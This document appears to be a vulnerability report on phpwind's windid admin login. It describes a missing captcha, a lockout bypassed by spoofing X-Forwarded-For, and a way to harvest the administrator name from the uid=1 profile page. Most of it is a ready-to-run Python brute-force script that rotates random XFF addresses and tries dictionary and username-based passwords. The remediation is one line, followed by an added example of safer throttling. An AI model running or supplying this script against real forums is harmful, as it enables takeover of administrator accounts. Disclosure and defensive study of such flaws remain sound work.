Phpwind admin account password can be brute-forced and the verification code can be bypassed
Let's take a look at the official website first.
http://www.phpwind.net/admin.php
A verification code (captcha) is present.
Now look at this one.
http://www.phpwind.net/windid/admin.php
The verification code is missing.
Then I set up phpwind on a virtual machine (the verification code is disabled by default).
http://192.168.1.117/windid/admin.php
No verification code.
Then log in with the account and password at this URL.
After a successful login, open http://192.168.1.117/admin.php
It is also shown as logged in.
But with ordinary brute forcing, an error is prompted after eight failed attempts.
However, testing shows that X-Forwarded-For is used to determine the source IP address.
So the XFF header can be modified to keep cracking.
To crack the password, you must know the account name.
There are many ways to obtain the administrator account. Here is a simple one.
It can be read from the personal space page. (This method will not work if this uid is deleted.)
http://192.168.1.117/index.php?m=space&uid=1
The brute-force cracking program code is as follows:
<poc>
# coding: utf-8
import httplib, re, random, urllib, time
from sys import argv

# crack: one login attempt, each with a random X-Forwarded-For value
def getHtml(host, username, password):
    ip = str(random.randint(1, 100)) + "." + str(random.randint(100, 244)) + "." + \
         str(random.randint(100, 244)) + "." + str(random.randint(100, 244))
    postHead = {"Host": host,
                "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
                "X-Forwarded-For": ip,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'Keep-alive',
                'Cookie': 'csrf_token=wooyun'}
    postContent = 'username=' + username + '&password=' + password + '&submit=&csrf_token=wooyun'
    resultHtml = httplib.HTTPConnection(host, 80, False)
    resultHtml.request('POST', '/windid/admin.php?a=login', body=postContent, headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect   # an empty body means the login succeeded

# get the administrator account name from the uid=1 personal space page
# (the link text matched here is the localized "personal space" label)
def getusername(host):
    url = 'http://' + host + '/index.php?m=space&uid=1'
    pageContent = urllib.urlopen(url).read()
    r1 = re.compile(r'">(\S{1,30})personal space</a>')
    username = r1.findall(pageContent)[0]
    return username

# obtain host, dictionary file and interval from argv for blasting
if (len(argv) == 1):
    print '----> python ' + argv[0] + ' host-address dictionary-file interval'
    print '----> python ' + argv[0] + ' 192.168.1.105 pass.txt 0.2'
else:
    host = argv[1]
    passfile = argv[2]
    sleeptime = argv[3]
    print 'Website host is ' + host
    print 'The password dictionary is ' + passfile
    print 'The interval is ' + sleeptime
    print '--->'
    username = getusername(host)
    f = open(passfile, 'r')
    htmlpass = f.read().split('\r\n')
    f.close()
    userpass = [username + '000000', username + '000000', username + username, username + '..',
                username + '.', username + 'admin888', username + 'admin123', username + 'admin',
                username + '000000']
    htmlpass = userpass + htmlpass
    for i in range(len(htmlpass)):
        time.sleep(float(sleeptime))
        print 'attempt password ' + htmlpass[i]
        if (getHtml(host, username, htmlpass[i]) == ''):
            print 'account is ' + username
            print 'password is ' + htmlpass[i]
            break
</poc>
Demo
Several cases were tested; the affected hostnames are redacted here.
Solution:
Strengthen the login verification.
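As an added illustration of the flaw reported above and of the fix (example code, not phpwind's own and not part of this report), the following Python keeps the eight-attempt failure counter once keyed on the client-supplied X-Forwarded-For header, as the report describes, and once keyed on the socket peer address plus the targeted account; the proxy address and the request values are constructed.

```python
# Added example, not phpwind code: the attempt counter keyed on X-Forwarded-For
# (the behaviour reported above) beside one keyed on the socket peer + account.
from collections import defaultdict

MAX_FAILURES = 8                 # attempt limit the report describes
TRUSTED_PROXIES = {"10.0.0.5"}   # constructed: the reverse proxy we operate

def client_ip(remote_addr, xff, trusted_proxies=TRUSTED_PROXIES):
    """X-Forwarded-For is honoured only when the TCP peer is our own proxy,
    and then only its last element (the one our proxy appended)."""
    if remote_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return remote_addr

def weak_keys(req):
    # trusts the attacker-controlled header as the source address
    return [req.get("X-Forwarded-For") or req["REMOTE_ADDR"]]

def hardened_keys(req):
    # throttle per real client address AND per targeted account
    ip = client_ip(req["REMOTE_ADDR"], req.get("X-Forwarded-For"))
    return [("ip", ip), ("user", req["username"])]

class LoginThrottle:
    def __init__(self, key_func):
        self.key_func, self.failures = key_func, defaultdict(int)

    def allowed(self, req):
        return all(self.failures[k] < MAX_FAILURES for k in self.key_func(req))

    def record_failure(self, req):
        for k in self.key_func(req):
            self.failures[k] += 1

def failed_logins(n):
    # constructed: n wrong passwords from one peer, each with a fresh XFF value
    return [{"REMOTE_ADDR": "203.0.113.7", "X-Forwarded-For": "198.51.100.%d" % i,
             "username": "admin"} for i in range(n)]

def attempts_reaching_password_check(throttle, requests):
    """Count how many of the (all failing) requests the throttle lets through."""
    passed = 0
    for req in requests:
        if throttle.allowed(req):
            passed += 1
            throttle.record_failure(req)
    return passed
```

With the weak keying every one of 50 failed attempts reaches the password check, because each carries a new header value; with the hardened keying only the first eight do.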